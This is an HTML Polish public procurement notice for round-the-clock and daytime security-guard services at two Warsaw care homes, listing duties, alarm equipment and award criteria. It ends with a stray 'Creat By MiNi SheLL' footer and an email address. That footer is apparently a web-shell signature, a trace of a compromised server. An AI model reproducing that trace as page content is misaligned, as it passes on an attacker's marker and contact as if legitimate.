<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Całodobowa ochrona mienia, budynków i osób Zakładu Opiekuńczo - Leczniczego im. Sue Ryder przy ul. Mehoffera 72/74 w Warszawie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Zakres zadań pracownika ochrony na terenie Zakładu Opiekuńczo - Leczniczego im. Sue Ryder w Warszawie przy ul. Mehoffera 72/74.
1.	Dyżur pełniony całodobowo (24h)
2.	Obsługa recepcji i szatni.
3.	Monitorowanie zabezpieczeń elektronicznych, kontrola zabezpieczeń pomieszczeń, zwracanie uwagi na osoby obce przebywające na terenie obiektu oraz niedopuszczanie do kradzieży na terenie obiektu.
4.	Niedopuszczenie do wynoszenia i dewastacji urządzeń stanowiących wyposażenie obiektów Zamawiającego.
5.	Powiadomienie służb specjalistycznych oraz Członków Zarządu Spółki w przypadku zaistnienia zdarzeń losowych tj. pożar, awaria sieci wodociągowej, gazowej lub elektrycznej, włamanie lub wyłączenie systemu alarmowego.
6.	Dokładne przekazywanie dyżuru osobie przejmującej dyżur - np. sprawdzenie okien, bram wjazdowych i drzwi do pomieszczeń (muszą być zamknięte).
7.	Przestrzeganie wewnętrznych zarządzeń i regulaminów obowiązujących na terenie Zakładu Zamawiającego i przeszkolenie pracowników w tym zakresie.
8.	Dokładne prowadzenie książki osób odwiedzających pacjentów wg sporządzonego wzoru  przez Zamawiającego. 
9.	Szczególne zwracanie uwagi na osoby obce przebywające na terenie zakładu.
10.	Podejmowanie interwencji w stosunku do osób zakłócających porządek.
11.	Kontrola pojazdów samochodowych pod względem posiadania przepustek uprawniających do wjazdu na teren Zakładu.
12.	Kontrolowanie przepustek wyjść poza Zakład pacjentów.
13.	Rygorystyczne przestrzeganie listy pacjentów, którzy ze względu na stan zdrowia nie mogą opuszczać samodzielnie Zakładu.
14.	Sprawowanie kontroli nad terenem Zakładu.
15.	Codzienna kontrola ogrodzenia wokół Zakładu - czy nie uległ zniszczeniu. W przypadku zniszczenia natychmiastowe powiadomienie o zaistniałym fakcie swoich przełożonych oraz Zarządu Spółki. Odnotowanie w raporcie godziny obchodu.
16.	Sprawowanie kontroli i czuwanie nad bezpieczeństwem pacjentów oraz budynków znajdujących się na terenie Zakładu:
1) budynek główny,
2) pawilon IV,
3) pawilon V,
4) pawilon VI,
5) pawilon VII,
6) budynek administracyjny,
7) budynek odnowy biologicznej,
8) budynek kotłowni,
oraz
1.	Dostawa i montaż na czas obowiązywania umowy w pomieszczeniu kasowym i aptece następujących urządzeń:
a)	Centrali alarmowej zabezpieczającej niezależnie dwa pomieszczenia kasę i aptekę,
b)	Nadajnika,
c)	Pilotów antynapadowych szt. 2,
d)	Czujek w pomieszczeniach apteki szt. 6.
2.	Konserwacja dostarczonych instalacji i urządzeń systemu alarmowego zainstalowanych w pomieszczeniu Kasy i Apteki.
a)	sprawdzanie sprawności działania systemu alarmowego raz na kwartał przez okres obowiązywania umowy,
b)	potwierdzanie w dzienniku ( książce) wykonywanej konserwacji i innych uwag dotyczących stanu i obsługi systemu alarmowego,
c)	bezzwłoczne sprawdzenie przyczyny uruchomienia systemu alarmowego w pomieszczeniach Kasy i Apteki oraz odnotowanie zaistniałego faktu w Książce pełnienia dyżurów-ochrony.
3.	Ochrona musi posiadać własny firmowy system łączności bezprzewodowej, niezbędny zwłaszcza w czasie dokonywanych obchodów w obiektach i na terenie Zakładu.
4.	Wykonawca ponosi odpowiedzialność materialną i prawną za powierzoną mu ochronę osób, obiektów i mienia oraz wszelkie szkody powstałe w wyniku nienależytego wykonania usługi.
5.	Wykonawca zapewni swoim pracownikom odpowiednią odzież roboczą ( logo firmy, napis ochrona).
6.	Zamykanie drzwi wejściowych w budynku Głównym o godz. 2200.
7.	Zamykanie drzwi od strony łącznika o godz. 2000.
8.	Zamykanie drzwi od kuchni o godz. 1800.
9.	Otwieranie bram wjazdowych oraz furtki.
10.	Włączanie oświetlenia na zewnątrz budynku o zmroku.
11.	Uprzejme traktowanie pacjentów oraz osób odwiedzających.
12.	Przyjmowanie pieczywa i mleka.

II. Wymagania personalne.
1.	Jeden agent ochrony - dyżur pełniony całodobowo.
2.	Zamawiający wymaga aby pracownik realizujący umowę był sprawny fizycznie o nienagannej kulturze i higienie osobistej oraz by posiadał umiejętność jazdy na rowerze.
3.	Zamawiający wymaga aby pracownicy ochrony mieli na wyposażeniu sprawny rower ze względu  na duży teren Zakładu ( ZOL im. Sue Ryder ul. Mehoffera 72/74 - ok. 6 hektarów).
4.	Zamawiający nie wymaga od pracowników ochrony wyznaczonych do ochrony naszych obiektu posiadania licencji pracownika ochrony fizycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ochrona fizyczna mienia, budynków i osób Zakładu Opiekuńczo - Leczniczego przy ul.  Szubińskiej 4 w Warszawie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochrona fizyczna mienia, budynków i osób Zakładu Opiekuńczo - Leczniczego 
 przy ul.  Szubińskiej 4 w Warszawie.
I. Zakres zadań .
1.	Ochrona świadczona będzie od poniedziałku do niedzieli oraz w święta od 6.00 do 20.00 śr. (14h).
2.	Obsługa recepcji i szatni.
3.	Monitorowanie zabezpieczeń elektronicznych, kontrola zabezpieczeń pomieszczeń, zwracanie uwagi na osoby obce przebywające na terenie obiektu oraz niedopuszczanie do kradzieży na terenie obiektu.
4.	Niedopuszczenie do wynoszenia i dewastacji urządzeń stanowiących wyposażenie obiektów Zamawiającego.
5.	Powiadomienie służb specjalistycznych oraz Członków Zarządu w przypadku zaistnienia zdarzeń losowych tj. pożar, awaria sieci wodociągowej, gazowej lub elektrycznej, włamanie lub wyłączenie systemu alarmowego.
6.	Dokładne przekazywanie dyżuru osobie przejmującej dyżur - np. sprawdzenie okien, bram wjazdowych i drzwi do pomieszczeń (muszą być zamknięte).
7.	Przestrzeganie wewnętrznych zarządzeń i regulaminów obowiązujących na terenie Zakładu Zamawiającego i przeszkolenie pracowników w tym zakresie.
8.	Dokładne prowadzenie książki osób odwiedzających pacjentów wg sporządzonego wzoru  przez Zamawiającego. 
9.	Szczególne zwracanie uwagi na osoby obce przebywające na terenie zakładu.
10.	Podejmowanie interwencji w stosunku do osób zakłócających porządek.
11.	Kontrola pojazdów samochodowych pod względem posiadania przepustek uprawniających do wjazdu na teren Zakładu.
12.	Kontrolowanie przepustek wyjść poza Zakład pacjentów.
13.	Rygorystyczne przestrzeganie listy pacjentów, którzy ze względu na stan zdrowia nie mogą opuszczać samodzielnie Zakładu.
14.	Sprawowanie kontroli i obejścia terenu Zakładu.
15.	Codzienna kontrola ogrodzenia wokół Zakładu - czy nie uległ zniszczeniu. Jeżeli są zauważone zmiany, natychmiastowe powiadomienie o zaistniałym fakcie swoich przełożonych oraz dyrekcji Zakładu. Odnotowanie w raporcie godziny obchody.
16.	Sprawowanie kontroli i czuwanie nad bezpieczeństwem pacjentów oraz budynków znajdujących się na terenie Zakładu.
17.	Ochrona musi posiadać własny firmowy system łączności bezprzewodowej, niezbędny zwłaszcza w czasie dokonywanych obchodów w obiektach i na terenie Zakładu.
18.	Wykonawca zapewni swoim pracownikom odpowiednią odzież roboczą ( logo firmy, napis ochrona).
19.	Wykonawca ponosi odpowiedzialność materialną i prawną za powierzoną mu ochronę osób, obiektów i mienia oraz wszelkie szkody powstałe w wyniku nienależytego wykonania usługi.
20.	Ochrona powierzonego mienia.
21.	Zamykanie drzwi wejściowych w budynku o godz. 2000.
22.	Otwieranie bram wjazdowych oraz furtki.
23.	Włączanie oświetlenia na zewnątrz budynku o zmroku.
24.	Uprzejme traktowanie pacjentów oraz osób odwiedzających.
25.	Przyjmowanie dostaw pieczywa i mleka.

II. Wymagania personalne.
1.	Jeden agent ochrony - dyżur pełniony w ZOL przy ul. Szubińskiej 4 (14h).
2.	Zamawiający wymaga aby pracownicy realizujący umowę byli sprawni fizycznie o nienagannej kulturze i higienie osobistej.
3.	Zamawiający nie wymaga od pracowników ochrony wyznaczonych do ochrony naszego obiektu posiadania licencji pracownika ochrony fizycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com